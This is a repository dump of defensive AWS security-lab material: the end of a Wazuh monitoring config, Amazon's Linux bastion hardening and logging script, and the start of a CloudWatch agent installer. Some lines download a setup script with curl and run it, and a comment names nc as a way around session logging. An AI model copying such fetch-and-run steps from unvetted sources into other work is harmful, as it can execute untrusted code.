yes 60 | yes 61 | yes 62 | yes 63 | yes 64 | yes 65 | yes 66 | 67 | 68 | 43200 69 | 70 | /var/ossec/etc/rootcheck/rootkit_files.txt 71 | /var/ossec/etc/rootcheck/rootkit_trojans.txt 72 | 73 | /var/ossec/etc/rootcheck/system_audit_rcl.txt 74 | /var/ossec/etc/rootcheck/system_audit_ssh.txt 75 | 76 | yes 77 | 78 | 79 | 80 | yes 81 | 1800 82 | 1d 83 | yes 84 | 85 | 86 | 87 | yes 88 | 1800 89 | 1d 90 | yes 91 | 92 | wodles/java 93 | wodles/ciscat 94 | 95 | 96 | 97 | 98 | yes 99 | yes 100 | /var/log/osquery/osqueryd.results.log 101 | /etc/osquery/osquery.conf 102 | yes 103 | 104 | 105 | 106 | 107 | no 108 | 1h 109 | yes 110 | yes 111 | yes 112 | yes 113 | yes 114 | yes 115 | yes 116 | 117 | 118 | 119 | yes 120 | 1m 121 | yes 122 | 123 | yes 124 | 1h 125 | 126 | 127 | yes 128 | 1h 129 | 130 | 131 | yes 132 | 1h 133 | 134 | 135 | 136 | 137 | no 138 | 10m 139 | yes 140 | yes 141 | 142 | detonationlab-v2-s3bucketcloudtrail-19gq8w59m8lcg 143 | $insert_access_key 144 | $insert_secret_key 145 | 146 | 147 | detonationlab-v2-s3bucketguardduty-1kn21uv4spg29 148 | firehose 149 | $insert_access_key 150 | $insert_secret_key 151 | 152 | 153 | detonationlab-v2-s3bucketiam-14shn3d2p31tq 154 | firehose 155 | $insert_access_key 156 | $insert_secret_key 157 | 158 | 159 | detonationlab-v2-s3bucketinspector-1mfadvaua8n96 160 | firehose 161 | $insert_access_key 162 | $insert_secret_key 163 | 164 | 165 | detonationlab-v2-s3bucketmacie-wzujsedp8ht6 166 | firehose 167 | $insert_access_key 168 | $insert_secret_key 169 | 170 | 171 | detonationlab-v2-s3bucketvpcflow-35q548dsiuoe 172 | flowlogs 173 | $insert_access_key 174 | $insert_secret_key 175 | 176 | 177 | 178 | 179 | 180 | no 181 | 182 | 183 | 43200 184 | 185 | yes 186 | 187 | 188 | yes 189 | 190 | 191 | no 192 | 193 | 194 | /etc,/usr/bin,/usr/sbin 195 | /bin,/sbin,/boot 196 | 197 | 198 | /etc/mtab 199 | /etc/hosts.deny 200 | /etc/mail/statistics 201 | /etc/random-seed 202 | /etc/random.seed 203 | /etc/adjtime 204 | /etc/httpd/logs 205 | /etc/utmpx 206 | /etc/wtmpx 207 | /etc/cups/certs 208 | /etc/dumpdates 209 | /etc/svc/volatile 210 | /sys/kernel/security 211 | /sys/kernel/debug 212 | 213 | 214 | /etc/ssl/private.key 215 | 216 | yes 217 | 218 | 219 | yes 220 | 221 | 222 | yes 223 | 224 | 225 | 226 | 227 | 127.0.0.1 228 | ^localhost.localdomain$ 229 | 172.16.0.2 230 | 231 | 232 | 233 | disable-account 234 | disable-account.sh 235 | user 236 | yes 237 | 238 | 239 | 240 | restart-ossec 241 | restart-ossec.sh 242 | 243 | 244 | 245 | 246 | firewall-drop 247 | firewall-drop.sh 248 | srcip 249 | yes 250 | 251 | 252 | 253 | host-deny 254 | host-deny.sh 255 | srcip 256 | yes 257 | 258 | 259 | 260 | route-null 261 | route-null.sh 262 | srcip 263 | yes 264 | 265 | 266 | 267 | win_route-null 268 | route-null.cmd 269 | srcip 270 | yes 271 | 272 | 273 | 278 | 279 | 280 | 281 | command 282 | df -P 283 | 360 284 | 285 | 286 | 287 | full_command 288 | netstat -tulpn | sed 's/\([[:alnum:]]\+\)\ \+[[:digit:]]\+\ \+[[:digit:]]\+\ \+\(.*\):\([[:digit:]]*\)\ \+\([0-9\.\:\*]\+\).\+\ \([[:digit:]]*\/[[:alnum:]\-]*\).*/\1 \2 == \3 == \4 \5/' | sort -k 4 -g | sed 's/ == \(.*\) ==/:\1/' | sed 1,2d 289 | netstat listening ports 290 | 360 291 | 292 | 293 | 294 | full_command 295 | last -n 20 296 | 360 297 | 298 | 299 | 300 | 301 | ruleset/decoders 302 | ruleset/rules 303 | 0215-policy_rules.xml 304 | etc/lists/audit-keys 305 | etc/lists/amazon/aws-sources 306 | etc/lists/amazon/aws-eventnames 307 | 308 | 309 | etc/decoders 310 | etc/rules 311 | 312 | 313 | 317 | 318 | no 319 | 1515 320 | yes 321 | yes 322 | 0 323 | yes 324 | no 325 | yes 326 | HIGH:!ADH:!EXP:!MD5:!RC4:!3DES:!CAMELLIA:@STRENGTH 327 | 328 | no 329 | /var/ossec/etc/sslmanager.cert 330 | /var/ossec/etc/sslmanager.key 331 | no 332 | 333 | 334 | 335 | wazuh 336 | node01 337 | master 338 | 339 | 1516 340 | 0.0.0.0 341 | 342 | NODE_IP 343 | 344 | no 345 | yes 346 | 347 | 348 | 349 | 350 | 351 | 352 | audit 353 | /var/log/audit/audit.log 354 | 355 | 356 | 357 | syslog 358 | /var/ossec/logs/active-responses.log 359 | 360 | 361 | 362 | syslog 363 | /var/log/messages 364 | 365 | 366 | 367 | syslog 368 | /var/log/secure 369 | 370 | 371 | 372 | syslog 373 | /var/log/maillog 374 | 375 | 376 | 377 | EOF 378 | 379 | -------------------------------------------------------------------------------- /additionalInstallationScripts/bastion_bootstrap.sh: -------------------------------------------------------------------------------- 1 | # Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"). 4 | # You may not use this file except in compliance with the License. 5 | # A copy of the License is located at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # or in the "license" file accompanying this file. This file is distributed 10 | # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either 11 | # express or implied. See the License for the specific language governing 12 | # permissions and limitations under the License. 13 | 14 | #!/bin/bash -e 15 | # Bastion Bootstrapping 16 | # authors: tonynv@amazon.com, sancard@amazon.com, ianhill@amazon.com 17 | # NOTE: This requires GNU getopt. On Mac OS X and FreeBSD you must install GNU getopt and mod the checkos function so that it's supported 18 | 19 | 20 | # Configuration 21 | PROGRAM='Linux Bastion' 22 | 23 | ##################################### Functions Definitions 24 | function checkos () { 25 | platform='unknown' 26 | unamestr=`uname` 27 | if [[ "$unamestr" == 'Linux' ]]; then 28 | platform='linux' 29 | else 30 | echo "[WARNING] This script is not supported on MacOS or freebsd" 31 | exit 1 32 | fi 33 | echo "${FUNCNAME[0]} Ended" 34 | } 35 | 36 | function usage () { 37 | echo "$0 " 38 | echo " " 39 | echo "options:" 40 | echo -e "--help \t Show options for this script" 41 | echo -e "--banner \t Enable or Disable Bastion Message" 42 | echo -e "--enable \t SSH Banner" 43 | echo -e "--tcp-forwarding \t Enable or Disable TCP Forwarding" 44 | echo -e "--x11-forwarding \t Enable or Disable X11 Forwarding" 45 | } 46 | 47 | function chkstatus () { 48 | if [ $? -eq 0 ] 49 | then 50 | echo "Script [PASS]" 51 | else 52 | echo "Script [FAILED]" >&2 53 | exit 1 54 | fi 55 | } 56 | 57 | function osrelease () { 58 | OS=`cat /etc/os-release | grep '^NAME=' | tr -d \" | sed 's/\n//g' | sed 's/NAME=//g'` 59 | if [[ "$OS" == "Ubuntu" ]]; then 60 | echo "Ubuntu" 61 | elif [[ "$OS" == *"Amazon Linux"* ]]; then 62 | echo "AMZN" 63 | elif [[ "$OS" == "CentOS Linux" ]]; then 64 | echo "CentOS" 65 | else 66 | echo "Operating System Not Found" 67 | fi 68 | echo "${FUNCNAME[0]} Ended" >> /var/log/cfn-init.log 69 | } 70 | 71 | function harden_ssh_security () { 72 | # Allow ec2-user only to access this folder and its content 73 | #chmod -R 770 /var/log/bastion 74 | #setfacl -Rdm other:0 /var/log/bastion 75 | 76 | # Make OpenSSH execute a custom script on logins 77 | echo -e "\nForceCommand /usr/bin/bastion/shell" >> /etc/ssh/sshd_config 78 | # LOGGING CONFIGURATION 79 | mkdir -p /var/log/bastion 80 | mkdir -p /usr/bin/bastion 81 | 82 | 83 | touch /tmp/messages 84 | chmod 770 /tmp/messages 85 | log_file_location="${bastion_mnt}/${bastion_log}" 86 | log_shadow_file_location="${bastion_mnt}/.${bastion_log}" 87 | 88 | 89 | cat <<'EOF' >> /usr/bin/bastion/shell 90 | bastion_mnt="/var/log/bastion" 91 | bastion_log="bastion.log" 92 | # Check that the SSH client did not supply a command. Only SSH to instance should be allowed. 93 | export Allow_SSH="ssh" 94 | if [[ -z $SSH_ORIGINAL_COMMAND ]] || [[ $SSH_ORIGINAL_COMMAND =~ ^$Allow_SSH ]]; then 95 | #Allow ssh to instance and log connection 96 | 97 | log_file=`echo "$log_shadow_file_location"` 98 | DATE_TIME_WHOAMI="`whoami`:`date "+%Y-%m-%d %H:%M:%S"`" 99 | LOG_ORIGINAL_COMMAND=`echo "$DATE_TIME_WHOAMI:$SSH_ORIGINAL_COMMAND"` 100 | echo "$LOG_ORIGINAL_COMMAND" >> "${bastion_mnt}/${bastion_log}" 101 | log_dir="/var/log/bastion/" 102 | script -qf /tmp/messages --command=/bin/bash 103 | else 104 | # The "script" program could be circumvented with some commands 105 | # (e.g. bash, nc). Therefore, I intentionally prevent users 106 | # from supplying commands. 107 | 108 | echo "This bastion supports interactive sessions only. Do not supply a command" 109 | exit 1 110 | fi 111 | EOF 112 | 113 | # Make the custom script executable 114 | chmod a+x /usr/bin/bastion/shell 115 | 116 | release=$(osrelease) 117 | if [ "$release" == "CentOS" ]; then 118 | semanage fcontext -a -t ssh_exec_t /usr/bin/bastion/shell 119 | fi 120 | 121 | echo "${FUNCNAME[0]} Ended" 122 | } 123 | 124 | function amazon_os () { 125 | echo "${FUNCNAME[0]} Started" 126 | chown root:ec2-user /usr/bin/script 127 | service sshd restart 128 | echo -e "\nDefaults env_keep += \"SSH_CLIENT\"" >>/etc/sudoers 129 | cat <<'EOF' >> /etc/bashrc 130 | #Added by linux bastion bootstrap 131 | declare -rx IP=$(echo $SSH_CLIENT | awk '{print $1}') 132 | EOF 133 | 134 | echo " declare -rx BASTION_LOG=${BASTION_MNT}/${BASTION_LOG}" >> /etc/bashrc 135 | 136 | cat <<'EOF' >> /etc/bashrc 137 | declare -rx PROMPT_COMMAND='history -a >(logger -t "ON: $(date) [FROM]:${IP} [USER]:${USER} [PWD]:${PWD}" -s 2>>${BASTION_LOG})' 138 | EOF 139 | chown root:ec2-user ${BASTION_MNT} 140 | chown root:ec2-user ${BASTION_LOGFILE} 141 | chown root:ec2-user ${BASTION_LOGFILE_SHADOW} 142 | chmod 662 ${BASTION_LOGFILE} 143 | chmod 662 ${BASTION_LOGFILE_SHADOW} 144 | chattr +a ${BASTION_LOGFILE} 145 | chattr +a ${BASTION_LOGFILE_SHADOW} 146 | touch /tmp/messages 147 | chown root:ec2-user /tmp/messages 148 | #Install CloudWatch Log service on AMZN 149 | yum update -y 150 | yum install -y awslogs 151 | export CWG=`curl http://169.254.169.254/latest/user-data/ | grep CLOUDWATCHGROUP | sed 's/CLOUDWATCHGROUP=//g'` 152 | echo "file = $BASTION_LOGFILE_SHADOW" >> /tmp/groupname.txt 153 | echo "log_group_name = $CWG" >> /tmp/groupname.txt 154 | 155 | cat <<'EOF' >> ~/cloudwatchlog.conf 156 | 157 | [/var/log/bastion] 158 | datetime_format = %b %d %H:%M:%S 159 | buffer_duration = 5000 160 | log_stream_name = {instance_id} 161 | initial_position = start_of_file 162 | EOF 163 | 164 | LINE=$(cat -n /etc/awslogs/awslogs.conf | grep '\[\/var\/log\/messages\]' | awk {'print $1'}) 165 | END_LINE=$(echo $(($LINE-1))) 166 | head -$END_LINE /etc/awslogs/awslogs.conf > /tmp/awslogs.conf 167 | cat /tmp/awslogs.conf > /etc/awslogs/awslogs.conf 168 | cat ~/cloudwatchlog.conf >> /etc/awslogs/awslogs.conf 169 | cat /tmp/groupname.txt >> /etc/awslogs/awslogs.conf 170 | export TMPREGION=`cat /etc/awslogs/awscli.conf | grep region` 171 | export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev` 172 | sed -i.back "s/$TMPREGION/region = $Region/g" /etc/awslogs/awscli.conf 173 | 174 | #Restart awslogs service 175 | service awslogs restart 176 | chkconfig awslogs on 177 | 178 | #Run security updates 179 | cat <<'EOF' >> ~/mycron 180 | 0 0 * * * yum -y update --security 181 | EOF 182 | crontab ~/mycron 183 | rm ~/mycron 184 | echo "${FUNCNAME[0]} Ended" 185 | } 186 | 187 | function ubuntu_os () { 188 | chown syslog:adm /var/log/bastion 189 | chown root:ubuntu /usr/bin/script 190 | cat <<'EOF' >> /etc/bash.bashrc 191 | #Added by linux bastion bootstrap 192 | declare -rx IP=$(who am i --ips|awk '{print $5}') 193 | EOF 194 | 195 | echo " declare -rx BASTION_LOG=${BASTION_MNT}/${BASTION_LOG}" >> /etc/bash.bashrc 196 | 197 | cat <<'EOF' >> /etc/bash.bashrc 198 | declare -rx PROMPT_COMMAND='history -a >(logger -t "ON: $(date) [FROM]:${IP} [USER]:${USER} [PWD]:${PWD}" -s 2>>${BASTION_LOG})' 199 | EOF 200 | chown root:ubuntu ${BASTION_MNT} 201 | chown root:ubuntu ${BASTION_LOGFILE} 202 | chown root:ubuntu ${BASTION_LOGFILE_SHADOW} 203 | chmod 662 ${BASTION_LOGFILE} 204 | chmod 662 ${BASTION_LOGFILE_SHADOW} 205 | chattr +a ${BASTION_LOGFILE} 206 | chattr +a ${BASTION_LOGFILE_SHADOW} 207 | touch /tmp/messages 208 | chown root:ubuntu /tmp/messages 209 | #Install CloudWatch logs on Ubuntu 210 | export CWG=`curl http://169.254.169.254/latest/user-data/ | grep CLOUDWATCHGROUP | sed 's/CLOUDWATCHGROUP=//g'` 211 | echo "file = $BASTION_LOGFILE_SHADOW" >> /tmp/groupname.txt 212 | echo "log_group_name = $CWG" >> /tmp/groupname.txt 213 | 214 | cat <<'EOF' >> ~/cloudwatchlog.conf 215 | [general] 216 | state_file = /var/awslogs/state/agent-state 217 | 218 | [/var/log/bastion] 219 | log_stream_name = {instance_id} 220 | datetime_format = %b %d %H:%M:%S 221 | EOF 222 | export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev` 223 | cat /tmp/groupname.txt >> ~/cloudwatchlog.conf 224 | 225 | curl https://s3.amazonaws.com/aws-cloudwatch/downloads/latest/awslogs-agent-setup.py -O 226 | export DEBIAN_FRONTEND=noninteractive 227 | apt-get install -y python 228 | chmod +x ./awslogs-agent-setup.py 229 | ./awslogs-agent-setup.py -n -r $Region -c ~/cloudwatchlog.conf 230 | 231 | #Install Unit file for Ubuntu 16.04 232 | ubuntu=`cat /etc/os-release | grep VERSION_ID | tr -d \VERSION_ID=\"` 233 | if [ "$ubuntu" == "16.04" ]; then 234 | cat <<'EOF' >> /etc/systemd/system/awslogs.service 235 | [Unit] 236 | Description=The CloudWatch Logs agent 237 | After=rc-local.service 238 | 239 | [Service] 240 | Type=simple 241 | Restart=always 242 | KillMode=process 243 | TimeoutSec=infinity 244 | PIDFile=/var/awslogs/state/awslogs.pid 245 | ExecStart=/var/awslogs/bin/awslogs-agent-launcher.sh --start --background --pidfile $PIDFILE --user awslogs --chuid awslogs & 246 | 247 | [Install] 248 | WantedBy=multi-user.target 249 | EOF 250 | fi 251 | 252 | #Restart awslogs service 253 | service awslogs restart 254 | export DEBIAN_FRONTEND=noninteractive 255 | apt-get install sysv-rc-conf -y 256 | sysv-rc-conf awslogs on 257 | 258 | #Restart SSH 259 | service ssh stop 260 | service ssh start 261 | 262 | #Run security updates 263 | apt-get install unattended-upgrades 264 | cat <<'EOF' >> ~/mycron 265 | 0 0 * * * unattended-upgrades -d 266 | EOF 267 | crontab ~/mycron 268 | rm ~/mycron 269 | echo "${FUNCNAME[0]} Ended" 270 | } 271 | 272 | function cent_os () { 273 | echo -e "\nDefaults env_keep += \"SSH_CLIENT\"" >>/etc/sudoers 274 | cat <<'EOF' >> /etc/bashrc 275 | #Added by linux bastion bootstrap 276 | declare -rx IP=$(echo $SSH_CLIENT | awk '{print $1}') 277 | EOF 278 | 279 | echo "declare -rx BASTION_LOG=${BASTION_MNT}/${BASTION_LOG}" >> /etc/bashrc 280 | 281 | cat <<'EOF' >> /etc/bashrc 282 | declare -rx PROMPT_COMMAND='history -a >(logger -t "ON: $(date) [FROM]:${IP} [USER]:${USER} [PWD]:${PWD}" -s 2>>${BASTION_LOG})' 283 | EOF 284 | chown root:centos ${BASTION_MNT} 285 | chown root:centos /usr/bin/script 286 | chown root:centos /var/log/bastion/bastion.log 287 | chmod 770 /var/log/bastion/bastion.log 288 | touch /tmp/messages 289 | chown root:centos /tmp/messages 290 | restorecon -v /etc/ssh/sshd_config 291 | /bin/systemctl restart sshd.service 292 | 293 | 294 | 295 | # Install CloudWatch Log service on Centos Linux 296 | export CWG=`curl http://169.254.169.254/latest/user-data/ | grep CLOUDWATCHGROUP | sed 's/CLOUDWATCHGROUP=//g'` 297 | centos=`cat /etc/os-release | grep VERSION_ID | tr -d \VERSION_ID=\"` 298 | if [ "$centos" == "7" ]; then 299 | echo "file = $BASTION_LOGFILE_SHADOW" >> /tmp/groupname.txt 300 | echo "log_group_name = $CWG" >> /tmp/groupname.txt 301 | 302 | cat <<'EOF' >> ~/cloudwatchlog.conf 303 | [general] 304 | state_file = /var/awslogs/state/agent-state 305 | use_gzip_http_content_encoding = true 306 | logging_config_file = /var/awslogs/etc/awslogs.conf 307 | 308 | [/var/log/bastion] 309 | datetime_format = %Y-%m-%d %H:%M:%S 310 | file = /var/log/messages 311 | buffer_duration = 5000 312 | log_stream_name = {instance_id} 313 | initial_position = start_of_file 314 | EOF 315 | export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev` 316 | cat /tmp/groupname.txt >> ~/cloudwatchlog.conf 317 | 318 | curl https://s3.amazonaws.com/aws-cloudwatch/downloads/latest/awslogs-agent-setup.py -O 319 | chmod +x ./awslogs-agent-setup.py 320 | ./awslogs-agent-setup.py -n -r $Region -c ~/cloudwatchlog.conf 321 | cat <<'EOF' >> /etc/systemd/system/awslogs.service 322 | [Unit] 323 | Description=The CloudWatch Logs agent 324 | After=rc-local.service 325 | 326 | [Service] 327 | Type=simple 328 | Restart=always 329 | KillMode=process 330 | TimeoutSec=infinity 331 | PIDFile=/var/awslogs/state/awslogs.pid 332 | ExecStart=/var/awslogs/bin/awslogs-agent-launcher.sh --start --background --pidfile $PIDFILE --user awslogs --chuid awslogs & 333 | 334 | [Install] 335 | WantedBy=multi-user.target 336 | EOF 337 | service awslogs restart 338 | chkconfig awslogs on 339 | else 340 | chown root:centos /var/log/bastion 341 | yum update -y 342 | yum install -y awslogs 343 | export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev` 344 | export TMPREGION=`cat /etc/awslogs/awscli.conf | grep region` 345 | sed -i.back "s/$TMPREGION/region = $Region/g" /etc/awslogs/awscli.conf 346 | export CWG=`curl http://169.254.169.254/latest/user-data/ | grep CLOUDWATCHGROUP | sed 's/CLOUDWATCHGROUP=//g'` 347 | echo "file = $BASTION_LOGFILE_SHADOW" >> /tmp/groupname.txt 348 | echo "log_group_name = $CWG" >> /tmp/groupname.txt 349 | 350 | cat <<'EOF' >> ~/cloudwatchlog.conf 351 | 352 | [/var/log/bastion] 353 | datetime_format = %b %d %H:%M:%S 354 | buffer_duration = 5000 355 | log_stream_name = {instance_id} 356 | initial_position = start_of_file 357 | EOF 358 | export TMPGROUP=`cat /etc/awslogs/awslogs.conf | grep ^log_group_name` 359 | export TMPGROUP=`echo $TMPGROUP | sed 's/\//\\\\\//g'` 360 | sed -i.back "s/$TMPGROUP/log_group_name = $CWG/g" /etc/awslogs/awslogs.conf 361 | cat ~/cloudwatchlog.conf >> /etc/awslogs/awslogs.conf 362 | cat /tmp/groupname.txt >> /etc/awslogs/awslogs.conf 363 | yum install ec2-metadata -y 364 | export TMPREGION=`cat /etc/awslogs/awscli.conf | grep region` 365 | export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev` 366 | sed -i.back "s/$TMPREGION/region = $Region/g" /etc/awslogs/awscli.conf 367 | sleep 3 368 | service awslogs stop 369 | sleep 3 370 | service awslogs start 371 | chkconfig awslogs on 372 | fi 373 | 374 | #Run security updates 375 | cat <<'EOF' >> ~/mycron 376 | 0 0 * * * yum -y update --security 377 | EOF 378 | crontab ~/mycron 379 | rm ~/mycron 380 | echo "${FUNCNAME[0]} Ended" 381 | } 382 | 383 | function request_eip() { 384 | release=$(osrelease) 385 | export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev` 386 | 387 | #Check if EIP already assigned. 388 | ALLOC=1 389 | ZERO=0 390 | INSTANCE_IP=`ifconfig -a | grep inet | awk {'print $2'} | sed 's/addr://g' | head -1` 391 | ASSIGNED=$(aws ec2 describe-addresses --region $Region --output text | grep $INSTANCE_IP | wc -l) 392 | if [ "$ASSIGNED" -gt "$ZERO" ]; then 393 | echo "Already assigned an EIP." 394 | else 395 | aws ec2 describe-addresses --region $Region --output text > /query.txt 396 | #Ensure we are only using EIPs from our Stack 397 | line=`curl http://169.254.169.254/latest/user-data/ | grep EIP_LIST` 398 | IFS=$':' DIRS=(${line//$','/:}) # Replace tabs with colons. 399 | 400 | for (( i=0 ; i<${#DIRS[@]} ; i++ )); do 401 | EIP=`echo ${DIRS[i]} | sed 's/\"//g' | sed 's/EIP_LIST=//g'` 402 | if [ $EIP != "Null" ]; then 403 | #echo "$i: $EIP" 404 | grep "$EIP" /query.txt >> /query2.txt; 405 | fi 406 | done 407 | mv /query2.txt /query.txt 408 | 409 | 410 | AVAILABLE_EIPs=`cat /query.txt | wc -l` 411 | 412 | if [ "$AVAILABLE_EIPs" -gt "$ZERO" ]; then 413 | FIELD_COUNT="5" 414 | INSTANCE_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id) 415 | echo "Running associate_eip_now" 416 | while read name; 417 | do 418 | #EIP_ENTRY=$(echo $name | grep eip | wc -l) 419 | EIP_ENTRY=$(echo $name | grep eni | wc -l) 420 | echo "EIP: $EIP_ENTRY" 421 | if [ "$EIP_ENTRY" -eq 1 ]; then 422 | echo "Already associated with an instance" 423 | echo "" 424 | else 425 | export EIP=`echo "$name" | sed 's/[\s]+/,/g' | awk {'print $4'}` 426 | EIPALLOC=`echo $name | awk {'print $2'}` 427 | echo "NAME: $name" 428 | echo "EIP: $EIP" 429 | echo "EIPALLOC: $EIPALLOC" 430 | aws ec2 associate-address --instance-id $INSTANCE_ID --allocation-id $EIPALLOC --region $Region 431 | fi 432 | done < /query.txt 433 | else 434 | echo "[ERROR] No Elastic IPs available in this region" 435 | exit 1 436 | fi 437 | 438 | INSTANCE_IP=`ifconfig -a | grep inet | awk {'print $2'} | sed 's/addr://g' | head -1` 439 | ASSIGNED=$(aws ec2 describe-addresses --region $Region --output text | grep $INSTANCE_IP | wc -l) 440 | if [ "$ASSIGNED" -eq 1 ]; then 441 | echo "EIP successfully assigned." 442 | else 443 | #Retry 444 | while [ "$ASSIGNED" -eq "$ZERO" ] 445 | do 446 | sleep 3 447 | request_eip 448 | INSTANCE_IP=`ifconfig -a | grep inet | awk {'print $2'} | sed 's/addr://g' | head -1` 449 | ASSIGNED=$(aws ec2 describe-addresses --region $Region --output text | grep $INSTANCE_IP | wc -l) 450 | done 451 | fi 452 | fi 453 | 454 | echo "${FUNCNAME[0]} Ended" 455 | } 456 | 457 | function call_request_eip() { 458 | Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev` 459 | ZERO=0 460 | INSTANCE_IP=`ifconfig -a | grep inet | awk {'print $2'} | sed 's/addr://g' | head -1` 461 | ASSIGNED=$(aws ec2 describe-addresses --region $Region --output text | grep $INSTANCE_IP | wc -l) 462 | if [ "$ASSIGNED" -gt "$ZERO" ]; then 463 | echo "Already assigned an EIP." 464 | else 465 | WAIT=$(shuf -i 1-30 -n 1) 466 | sleep "$WAIT" 467 | request_eip 468 | fi 469 | echo "${FUNCNAME[0]} Ended" 470 | } 471 | 472 | function prevent_process_snooping() { 473 | # Prevent bastion host users from viewing processes owned by other users. 474 | 475 | mount -o remount,rw,hidepid=2 /proc 476 | awk '!/proc/' /etc/fstab > temp && mv temp /etc/fstab 477 | echo "proc /proc proc defaults,hidepid=2 0 0" >> /etc/fstab 478 | echo "${FUNCNAME[0]} Ended" 479 | } 480 | 481 | ##################################### End Function Definitions 482 | 483 | # Call checkos to ensure platform is Linux 484 | checkos 485 | 486 | ## set an initial value 487 | SSH_BANNER="LINUX BASTION" 488 | 489 | # Read the options from cli input 490 | TEMP=`getopt -o h: --long help,banner:,enable:,tcp-forwarding:,x11-forwarding: -n $0 -- "$@"` 491 | eval set -- "$TEMP" 492 | 493 | 494 | if [ $# == 1 ] ; then echo "No input provided! type ($0 --help) to see usage help" >&2 ; exit 1 ; fi 495 | 496 | # extract options and their arguments into variables. 497 | while true; do 498 | case "$1" in 499 | -h | --help) 500 | usage 501 | exit 1 502 | ;; 503 | --banner) 504 | BANNER_PATH="$2"; 505 | shift 2 506 | ;; 507 | --enable) 508 | ENABLE="$2"; 509 | shift 2 510 | ;; 511 | --tcp-forwarding) 512 | TCP_FORWARDING="$2"; 513 | shift 2 514 | ;; 515 | --x11-forwarding) 516 | X11_FORWARDING="$2"; 517 | shift 2 518 | ;; 519 | --) 520 | break 521 | ;; 522 | *) 523 | break 524 | ;; 525 | esac 526 | done 527 | 528 | # BANNER CONFIGURATION 529 | BANNER_FILE="/etc/ssh_banner" 530 | if [[ $ENABLE == "true" ]];then 531 | if [ -z ${BANNER_PATH} ];then 532 | echo "BANNER_PATH is null skipping ..." 533 | else 534 | echo "BANNER_PATH = ${BANNER_PATH}" 535 | echo "Creating Banner in ${BANNER_FILE}" 536 | echo "curl -s ${BANNER_PATH} > ${BANNER_FILE}" 537 | curl -s ${BANNER_PATH} > ${BANNER_FILE} 538 | if [ $BANNER_FILE ] ;then 539 | echo "[INFO] Installing banner ... " 540 | echo -e "\n Banner ${BANNER_FILE}" >>/etc/ssh/sshd_config 541 | else 542 | echo "[INFO] banner file is not accessible skipping ..." 543 | exit 1; 544 | fi 545 | fi 546 | else 547 | echo "Banner message is not enabled!" 548 | fi 549 | 550 | # LOGGING CONFIGURATION 551 | declare -rx BASTION_MNT="/var/log/bastion" 552 | declare -rx BASTION_LOG="bastion.log" 553 | echo "Setting up bastion session log in ${BASTION_MNT}/${BASTION_LOG}" 554 | mkdir -p ${BASTION_MNT} 555 | declare -rx BASTION_LOGFILE="${BASTION_MNT}/${BASTION_LOG}" 556 | declare -rx BASTION_LOGFILE_SHADOW="${BASTION_MNT}/.${BASTION_LOG}" 557 | touch ${BASTION_LOGFILE} 558 | ln ${BASTION_LOGFILE} ${BASTION_LOGFILE_SHADOW} 559 | 560 | 561 | #Enable/Disable TCP forwarding 562 | TCP_FORWARDING=`echo "$TCP_FORWARDING" | sed 's/\\n//g'` 563 | 564 | #Enable/Disable X11 forwarding 565 | X11_FORWARDING=`echo "$X11_FORWARDING" | sed 's/\\n//g'` 566 | 567 | echo "Value of TCP_FORWARDING - $TCP_FORWARDING" 568 | 569 | echo "Value of X11_FORWARDING - $X11_FORWARDING" 570 | 571 | if [[ $TCP_FORWARDING == "false" ]];then 572 | awk '!/AllowTcpForwarding/' /etc/ssh/sshd_config > temp && mv temp /etc/ssh/sshd_config 573 | echo "AllowTcpForwarding no" >> /etc/ssh/sshd_config 574 | harden_ssh_security 575 | fi 576 | 577 | if [[ $X11_FORWARDING == "false" ]];then 578 | awk '!/X11Forwarding/' /etc/ssh/sshd_config > temp && mv temp /etc/ssh/sshd_config 579 | echo "X11Forwarding no" >> /etc/ssh/sshd_config 580 | fi 581 | 582 | release=$(osrelease) 583 | # Ubuntu Linux 584 | if [ "$release" == "Ubuntu" ]; then 585 | #Call function for Ubuntu 586 | ubuntu_os 587 | # AMZN Linux 588 | elif [ "$release" == "AMZN" ]; then 589 | #Call function for AMZN 590 | amazon_os 591 | # CentOS Linux 592 | elif [ "$release" == "CentOS" ]; then 593 | #Call function for CentOS 594 | cent_os 595 | else 596 | echo "[ERROR] Unsupported Linux Bastion OS" 597 | exit 1 598 | fi 599 | 600 | prevent_process_snooping 601 | 602 | call_request_eip 603 | 604 | echo "Bootstrap complete." 605 | -------------------------------------------------------------------------------- /additionalInstallationScripts/cloudwatchAgentLogs.ps1: -------------------------------------------------------------------------------- 1 | #Download the CloudWatch agent 2 | $url = "https://s3.amazonaws.com/amazoncloudwatch-agent/windows/amd64/latest/AmazonCloudWatchAgent.zip" 3 | $output = "C:\Users\Administrator\Desktop\AmazonCloudWatchAgent.zip" 4 | Invoke-WebRequest -Uri $url -OutFile $output 5 | 6 | #unzip CloudWatch agent 7 | Add-Type -AssemblyName System.IO.Compression.FileSystem 8 | function Unzip 9 | { 10 | param([string]$zipfile, [string]$outpath) 11 | 12 | [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) 13 | } 14 | 15 | Unzip "C:\Users\Administrator\Desktop\AmazonCloudWatchAgent.zip" "C:\Users\Administrator\Desktop\AmazonCloudWatchAgent" 16 | 17 | #change to directory 18 | Set-Location -Path "C:\Users\Administrator\Desktop\AmazonCloudWatchAgent" 19 | 20 | #Install the package 21 | #On a server running Windows Server, open PowerShell, change to the directory containing the unzipped package, and use the install.ps1 script to install it. 22 | .\install.ps1 23 | 24 | #Modify the Common Configuration and Named Profile for CloudWatch Agent 25 | C:\Users\Administrator\Documents\cloudwatchconfig.json 26 | 27 | $config = '{ 28 | "logs": { 29 | "logs_collected": { 30 | "windows_events": { 31 | "collect_list": [{ 32 | "event_format": "xml", 33 | "event_levels": [ 34 | "VERBOSE", 35 